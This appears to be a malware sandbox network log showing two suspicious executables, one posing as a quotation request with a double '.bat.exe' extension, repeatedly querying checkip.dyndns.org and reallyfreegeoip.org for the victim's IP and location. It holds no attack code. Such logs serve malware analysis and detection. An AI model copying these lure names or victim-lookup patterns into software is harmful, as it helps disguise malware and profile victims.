                                                                                                                      Nov 21, 2024 12:20:37.351619959 CET151OUTGET / HTTP/1.1
                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                      Host: checkip.dyndns.org
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Nov 21, 2024 12:20:38.664212942 CET320INHTTP/1.1 200 OK
                                                                                                                      Date: Thu, 21 Nov 2024 11:20:38 GMT
                                                                                                                      Content-Type: text/html
                                                                                                                      Content-Length: 103
                                                                                                                      Connection: keep-alive
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Pragma: no-cache
                                                                                                                      X-Request-ID: 5f17c580790531fc659476c498d80fc4
                                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      14192.168.2.949813193.122.6.168807636C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Nov 21, 2024 12:20:38.081000090 CET151OUTGET / HTTP/1.1
                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                      Host: checkip.dyndns.org
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Nov 21, 2024 12:20:39.397109032 CET320INHTTP/1.1 200 OK
                                                                                                                      Date: Thu, 21 Nov 2024 11:20:39 GMT
                                                                                                                      Content-Type: text/html
                                                                                                                      Content-Length: 103
                                                                                                                      Connection: keep-alive
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Pragma: no-cache
                                                                                                                      X-Request-ID: d9711135baa646479b48bf523530d52e
                                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      15192.168.2.949827193.122.6.168807636C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Nov 21, 2024 12:20:41.235826015 CET151OUTGET / HTTP/1.1
                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                      Host: checkip.dyndns.org
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Nov 21, 2024 12:20:42.501355886 CET320INHTTP/1.1 200 OK
                                                                                                                      Date: Thu, 21 Nov 2024 11:20:42 GMT
                                                                                                                      Content-Type: text/html
                                                                                                                      Content-Length: 103
                                                                                                                      Connection: keep-alive
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Pragma: no-cache
                                                                                                                      X-Request-ID: 0e415eff8b7c8568bfbc16f954c5bc69
                                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      0192.168.2.949727188.114.97.34437264C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-11-21 11:20:14 UTC84OUTGET /xml/8.46.123.75 HTTP/1.1
                                                                                                                      Host: reallyfreegeoip.org
                                                                                                                      Connection: Keep-Alive
                                                                                                                      2024-11-21 11:20:14 UTC853INHTTP/1.1 200 OK
                                                                                                                      Date: Thu, 21 Nov 2024 11:20:14 GMT
                                                                                                                      Content-Type: text/xml
                                                                                                                      Content-Length: 361
                                                                                                                      Connection: close
                                                                                                                      Cache-Control: max-age=31536000
                                                                                                                      CF-Cache-Status: HIT
                                                                                                                      Age: 151923
                                                                                                                      Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT
                                                                                                                      Accept-Ranges: bytes
                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1QBNxVIJTLaWDCTbu0sZ%2BU0K3hU1KsTdYPFZ%2Fkv48XuLikluYPffiGw5HK9sdlJwzTt7I73xeoMDEi1rl32fN%2FGFYQV8OTlMkTL6afkI9PAl7bF8ONykG4m5nO%2Fvvrq8DJg04fDG"}],"group":"cf-nel","max_age":604800}
                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                      Server: cloudflare
                                                                                                                      CF-RAY: 8e604a135e2dc402-EWR
                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1673&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=698&delivery_rate=1750599&cwnd=177&unsent_bytes=0&cid=463b771eed5e0d57&ts=464&x=0"
                                                                                                                      2024-11-21 11:20:14 UTC361INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f 6e
                                                                                                                      Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      1192.168.2.949734188.114.97.34437264C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-11-21 11:20:16 UTC60OUTGET /xml/8.46.123.75 HTTP/1.1
                                                                                                                      Host: reallyfreegeoip.org
                                                                                                                      2024-11-21 11:20:16 UTC853INHTTP/1.1 200 OK
                                                                                                                      Date: Thu, 21 Nov 2024 11:20:16 GMT
                                                                                                                      Content-Type: text/xml
                                                                                                                      Content-Length: 361
                                                                                                                      Connection: close
                                                                                                                      Cache-Control: max-age=31536000
                                                                                                                      CF-Cache-Status: HIT
                                                                                                                      Age: 151925
                                                                                                                      Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT
                                                                                                                      Accept-Ranges: bytes
                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZASHS1r3hyfDhgK2%2BiYzTVlHE22DaJWnXqrDK98KWNYSwX519zW7Gs%2B2kVMj1j4KnEEbzvf8gDQCzdanraNkJzpJ1x1H14fKX6XQ0x%2B6YwnJw%2BAYHLCjCL1xqawLXLEcpxyahosF"}],"group":"cf-nel","max_age":604800}
                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                      Server: cloudflare
                                                                                                                      CF-RAY: 8e604a20cafb4387-EWR
                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1564&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=698&delivery_rate=1763285&cwnd=191&unsent_bytes=0&cid=945768affa97641a&ts=461&x=0"
                                                                                                                      2024-11-21 11:20:16 UTC361INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f 6e
                                                                                                                      Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      2192.168.2.949742188.114.97.34437636C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-11-21 11:20:19 UTC84OUTGET /xml/8.46.123.75 HTTP/1.1
                                                                                                                      Host: reallyfreegeoip.org
                                                                                                                      Connection: Keep-Alive
                                                                                                                      2024-11-21 11:20:20 UTC859INHTTP/1.1 200 OK
                                                                                                                      Date: Thu, 21 Nov 2024 11:20:19 GMT
                                                                                                                      Content-Type: text/xml
                                                                                                                      Content-Length: 361
                                                                                                                      Connection: close
                                                                                                                      Cache-Control: max-age=31536000
                                                                                                                      CF-Cache-Status: HIT
                                                                                                                      Age: 151928
                                                                                                                      Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT
                                                                                                                      Accept-Ranges: bytes
                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zRcVpEjRgiO%2FhXnuhtrznKZUsG95U6OXQX0LknNUu1aUemReX%2Bpt%2BmPvP9IE%2BH1LMoUaJ9VlkEvyWasAP5HgeE5CfFcaWDO2U8TR%2BzvJcU7psL9dTuTCSzpmjKXWaVc%2FuE3%2Fx2RS"}],"group":"cf-nel","max_age":604800}
                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                      Server: cloudflare
                                                                                                                      CF-RAY: 8e604a333f4f42ec-EWR
                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=2085&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=698&delivery_rate=1354359&cwnd=193&unsent_bytes=0&cid=79b0dc616919f1a0&ts=584&x=0"
                                                                                                                      2024-11-21 11:20:20 UTC361INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f 6e
                                                                                                                      Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      3192.168.2.949748188.114.97.34437264C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-11-21 11:20:19 UTC60OUTGET /xml/8.46.123.75 HTTP/1.1
                                                                                                                      Host: reallyfreegeoip.org
                                                                                                                      2024-11-21 11:20:20 UTC855INHTTP/1.1 200 OK
                                                                                                                      Date: Thu, 21 Nov 2024 11:20:20 GMT
                                                                                                                      Content-Type: text/xml
                                                                                                                      Content-Length: 361
                                                                                                                      Connection: close
                                                                                                                      Cache-Control: max-age=31536000
                                                                                                                      CF-Cache-Status: HIT
                                                                                                                      Age: 151929
                                                                                                                      Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT
                                                                                                                      Accept-Ranges: bytes
                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=C7N38IJJJNLgoU1khQChEbqOuqnVg%2F9iS5QKXz94aKPi%2BWBoyoJUQ3%2FwszMJap5BKHTf9QyeVJ7vfGuxGlrZZYZhrer3%2BmZWGCQS3g%2B5rs5OrFKhlkwDkakdj6vabsvaD5LQ3Lxu"}],"group":"cf-nel","max_age":604800}
                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                      Server: cloudflare
                                                                                                                      CF-RAY: 8e604a3529bd334e-EWR
                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1949&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=698&delivery_rate=1463659&cwnd=173&unsent_bytes=0&cid=6c427286a2b27797&ts=477&x=0"
                                                                                                                      2024-11-21 11:20:20 UTC361INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f 6e
                                                                                                                      Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      4192.168.2.949751188.114.97.34437636C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-11-21 11:20:21 UTC60OUTGET /xml/8.46.123.75 HTTP/1.1
                                                                                                                      Host: reallyfreegeoip.org
                                                                                                                      2024-11-21 11:20:22 UTC859INHTTP/1.1 200 OK
                                                                                                                      Date: Thu, 21 Nov 2024 11:20:21 GMT
                                                                                                                      Content-Type: text/xml
                                                                                                                      Content-Length: 361
                                                                                                                      Connection: close
                                                                                                                      Cache-Control: max-age=31536000
                                                                                                                      CF-Cache-Status: HIT
                                                                                                                      Age: 151930
                                                                                                                      Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT
                                                                                                                      Accept-Ranges: bytes
                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=EMjrAAkEkqZNaUOIlZAkT6cCehLnNUZk2Q1k8jGgg9G%2FSJ9oOjyTK3uajlc8n%2B8Z%2BK7wWdtaUioPJ2Uiu8e6qxhg%2FR%2Brjhr%2Bk7z3qLylhHu3vPgAQaT%2FBRfHKvYojFIsdWC66PGr"}],"group":"cf-nel","max_age":604800}
                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                      Server: cloudflare
                                                                                                                      CF-RAY: 8e604a413b924201-EWR
                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1600&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=698&delivery_rate=1651583&cwnd=219&unsent_bytes=0&cid=f49d718c0c9eb0f9&ts=461&x=0"
                                                                                                                      2024-11-21 11:20:22 UTC361INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f 6e
                                                                                                                      Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      5192.168.2.949756188.114.97.34437264C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-11-21 11:20:22 UTC84OUTGET /xml/8.46.123.75 HTTP/1.1
                                                                                                                      Host: reallyfreegeoip.org
                                                                                                                      Connection: Keep-Alive
                                                                                                                      2024-11-21 11:20:23 UTC851INHTTP/1.1 200 OK
                                                                                                                      Date: Thu, 21 Nov 2024 11:20:23 GMT
                                                                                                                      Content-Type: text/xml
                                                                                                                      Content-Length: 361
                                                                                                                      Connection: close
                                                                                                                      Cache-Control: max-age=31536000
                                                                                                                      CF-Cache-Status: HIT
                                                                                                                      Age: 151932
                                                                                                                      Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT
                                                                                                                      Accept-Ranges: bytes
                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=l%2FJznd4GmAj1NM8clbD7DMPMKHqi55NB8o7g6lNhusi3J3bhoeemfEjnaczEGxIueA10dSRBHyAQEj%2BnND5cIJjDLyXJVpku3X9x7RPnw72354TbXiWh6liUTM%2BG8O9Mo4LFxGws"}],"group":"cf-nel","max_age":604800}
                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                      Server: cloudflare
                                                                                                                      CF-RAY: 8e604a48fa1842fd-EWR
                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1578&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=698&delivery_rate=1864623&cwnd=247&unsent_bytes=0&cid=dea8a7088951cb31&ts=474&x=0"
                                                                                                                      2024-11-21 11:20:23 UTC361INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f 6e
                                                                                                                      Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      6192.168.2.949764188.114.97.34437636C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-11-21 11:20:24 UTC60OUTGET /xml/8.46.123.75 HTTP/1.1
                                                                                                                      Host: reallyfreegeoip.org
                                                                                                                      2024-11-21 11:20:25 UTC849INHTTP/1.1 200 OK
                                                                                                                      Date: Thu, 21 Nov 2024 11:20:25 GMT
                                                                                                                      Content-Type: text/xml
                                                                                                                      Content-Length: 361
                                                                                                                      Connection: close
                                                                                                                      Cache-Control: max-age=31536000
                                                                                                                      CF-Cache-Status: HIT
                                                                                                                      Age: 151934
                                                                                                                      Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT
                                                                                                                      Accept-Ranges: bytes
                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GfvM6G0PuCXrILp2MxM%2BXzBOHKsm9f1tFCFmaN6Zbyk7IZGspWSEWq%2FpJWxbQwrbEUXKfRXujlGVrzZjG3vCTNZyfiK72ltl66YqDUN7hwkLj82q4MhSpmGTlT6Z3p63Q3MTQZh0"}],"group":"cf-nel","max_age":604800}
                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                      Server: cloudflare
                                                                                                                      CF-RAY: 8e604a555f704367-EWR
                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=2342&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=698&delivery_rate=1189894&cwnd=235&unsent_bytes=0&cid=a7c633bdfd75ec3f&ts=471&x=0"
                                                                                                                      2024-11-21 11:20:25 UTC361INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f 6e
                                                                                                                      Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      7192.168.2.949767188.114.97.34437264C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-11-21 11:20:26 UTC60OUTGET /xml/8.46.123.75 HTTP/1.1
                                                                                                                      Host: reallyfreegeoip.org
                                                                                                                      2024-11-21 11:20:26 UTC857INHTTP/1.1 200 OK
                                                                                                                      Date: Thu, 21 Nov 2024 11:20:26 GMT
                                                                                                                      Content-Type: text/xml
                                                                                                                      Content-Length: 361
                                                                                                                      Connection: close
                                                                                                                      Cache-Control: max-age=31536000
                                                                                                                      CF-Cache-Status: HIT
                                                                                                                      Age: 151935
                                                                                                                      Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT
                                                                                                                      Accept-Ranges: bytes
                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HZVazgdu8QvYb0C4jxCyTqpN3B0zb4HXmqciN3LPpmVft%2BaJ2QgyK%2BTJPaHh0T2xNipGlAjrzPtdEukcosL8wr%2FO1pVeCWv28UHT2Fw2nDQHFXEV4P6VVR%2B5IO0hNgNp%2BAzL%2BZ6G"}],"group":"cf-nel","max_age":604800}
                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                      Server: cloudflare
                                                                                                                      CF-RAY: 8e604a5d5a8719bb-EWR
                                                                                                                      alt-svc: h3=":443"; ma=86400
